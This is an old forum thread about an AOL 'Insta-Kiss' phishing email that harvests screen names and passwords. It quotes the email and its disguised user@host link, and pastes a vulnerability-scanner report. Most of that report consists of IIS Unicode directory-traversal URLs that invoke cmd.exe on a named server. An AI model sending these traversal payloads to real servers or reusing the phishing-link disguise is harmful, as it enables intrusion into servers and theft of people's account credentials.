My girlfriend was on the internet today and someone sent her a AOL Instant Kiss! AOL Instant Kiss is a e-mail that will steal your Screen name and password if the user click's on it the sends the information back to the Script Kiddy... This Subj: Someone has been thinking of you! < /html>< font ptsize=1>
Date: 2/9/02 2:53:18 PM Pacific Standard Time
From: ktsfr
BCC: Ezkmogrl420




AOL Insta-Kiss

Dear AOL Member


Someone thinks very highly of you and has sent you an AOL Insta-Kiss.
The AOL Insta-Kiss is a way for people to express their emotions for others
with America Online. The Insta-Kiss can be the start of a long lasting
romance
or a way to show that special someone just how much you care.

To view your AOL Insta-Kiss Click Here.

Would you like to send me or someone else a kiss?
It's easy with Love@AOL's InstaKiss.

The AOL Insta-Kiss is just one of the many cool things
you can find in Love@AOL. You have been sent an AOL Insta-Kiss

Where it says click here to view your AOL INSTANT KISS I held my cursor over the link and it said http://greetings.aol.com@209.202.218.12/al4/instant kiss so I did a scan to see who it was and this was the results

Stealth Report
Stealth report for www.angelfire.com (209.202.218.12)
Date: 2/9/02 6:05:04 PM

Scan Rule: Top 20 Scan

209.202.218.12
Host name: www.angelfire.com
Port: 80
Server: Apache/1.3.9 (Unix) FrontPage/5.0.2.2510

Server may have HTTP vulnerabilities/exposures. (12 items)

Special Request
Risk Level: High
Location: http://209.202.218.12/MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+

IIS Unicode Vulnerability.


Special Request
Risk Level: High
Location: http://209.202.218.12/MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+

IIS Unicode Vulnerability.


Special Request
Risk Level: High
Location: http://209.202.218.12/cgi-bin/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:

IIS Unicode Vulnerability.


Special Request
Risk Level: High
Location: http://209.202.218.12/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+

IIS Unicode Vulnerability.


Special Request
Risk Level: High
Location: http://209.202.218.12/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+

IIS Unicode Vulnerability.


Special Request
Risk Level: High
Location: http://209.202.218.12/pbserver/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:

IIS Unicode Vulnerability.


Special Request
CVE: CAN-2000-0884
Risk Level: Medium
Location: http://209.202.218.12/scripts/..%bg%9v../winnt/system32/cmd.exe?/c+dir

IIS 4.0 and 5.0 allows remote attackers to read documents outside of the web root, and possibly execute arbitrary commands, via malformed URLs that contain UNICODE encoded characters, aka the "Web Server Folder Traversal" vulnerability.


Special Request
CVE: CAN-2000-0884
Risk Level: Medium
Location: http://209.202.218.12/scripts/..%bg%af../winnt/system32/cmd.exe?/c+dir

IIS 4.0 and 5.0 allows remote attackers to read documents outside of the web root, and possibly execute arbitrary commands, via malformed URLs that contain UNICODE encoded characters, aka the "Web Server Folder Traversal" vulnerability.


Special Request
CVE: CAN-2000-0884
Risk Level: Medium
Location: http://209.202.218.12/scripts/..%bg%qf../winnt/system32/cmd.exe?/c+dir

IIS 4.0 and 5.0 allows remote attackers to read documents outside of the web root, and possibly execute arbitrary commands, via malformed URLs that contain UNICODE encoded characters, aka the "Web Server Folder Traversal" vulnerability.


Special Request
CVE: CAN-2000-0884
Risk Level: Medium
Location: http://209.202.218.12/scripts/..%cg%9v../winnt/system32/cmd.exe?/c+dir

IIS 4.0 and 5.0 allows remote attackers to read documents outside of the web root, and possibly execute arbitrary commands, via malformed URLs that contain UNICODE encoded characters, aka the "Web Server Folder Traversal" vulnerability.


Special Request
CVE: CAN-2000-0884
Risk Level: Medium
Location: http://209.202.218.12/scripts/..%t0%af../winnt/system32/cmd.exe?/c+dir

IIS 4.0 and 5.0 allows remote attackers to read documents outside of the web root, and possibly execute arbitrary commands, via malformed URLs that contain UNICODE encoded characters, aka the "Web Server Folder Traversal" vulnerability.


Special Request
CVE: CAN-2000-0884
Risk Level: Medium
Location: http://209.202.218.12/scripts/..%t0%qf../winnt/system32/cmd.exe?/c+dir

IIS 4.0 and 5.0 allows remote attackers to read documents outside of the web root, and possibly execute arbitrary commands, via malformed URLs that contain UNICODE encoded characters, aka the "Web Server Folder Traversal" vulnerability.

How can I get this guy to stop sending mail to my AOL ACCOUNTS!I called AOL they did nothing ...
I put the changed all the privacy settings high.

You need to call Angelfire dude and report the account "al4" for doing this. They should be prompt and suspend it. AOL has nothing to do with this guy.

Oh, you could also forward the email, if it is from a fellow AOL member, to screenname "TOSSPAM" They'll take care of it if he/she has AOL service.

Wow... Where did you do that scan?

alright thanks

ac1dsp3ctrum
Wow... Where did you do that scan?


I used the program Stealth 2.0
very tight!

Stealth is a really kool prog. I've used it many times before.

If you go to www.neworder.box.sk you can get Advanced Administration Tools this is pretty tight to.

I think this scam is the one where you have to goto the 'Insta Kiss' site. Then enter your screen name and password to find out who sent you the alledged kiss.

Now if your dumb enough to give your screen name AND password to someone, well maybe you deserve the tag 'idiot' or '*******'.



:)

the_g_nee: But it's his girlfriend he's talking about, not him...she might not be too internet/security-literate.

Excellent heads up! Keep it up! :)

Now if your dumb enough to give your screen name AND password to someone, well maybe you deserve the tag 'idiot' or '*******'.

My girlfriend did not click the link!Nor did she give her screen name and password

I know that cracker, never saying she did! :)

But you can bet there are lots of people out there who did though.



:)

Hey, thanks man. i sent it out (without the scan) to everyone in my phonebook.

No promblem Tedob1

I am very new to this whole thing, but was very surprised what you can see by using a scanning tool. Now i would like to know how efficiant my own protection on my computers is, and there for i would like having such a scanner. like the stealth you talk about ..
my problem is, i fear, that the tools could be infected with viruses or with trojan horses..
so i did not download them so far.
can you tell me, where i can get a version, free of such viruses/horses ?
i would appreciate your help. as i told you, i am not such a pro like all of you, but willing to learn.
Valentino

Server: Apache/1.3.9 (Unix) FrontPage/5.0.2.2510

Good god, haven't they heard of upgrading? Apache's on 1.3.23 right now not to mention it's got some vulnerabilities from way back that were in 1.3.6-1.3.12. As far as the IIS unicode vulnerability...that looks just like Code Red that's had countless (over 5000) servers running infected IIS pounding on my linux box.

Hopefully this guy gets shafted hard too.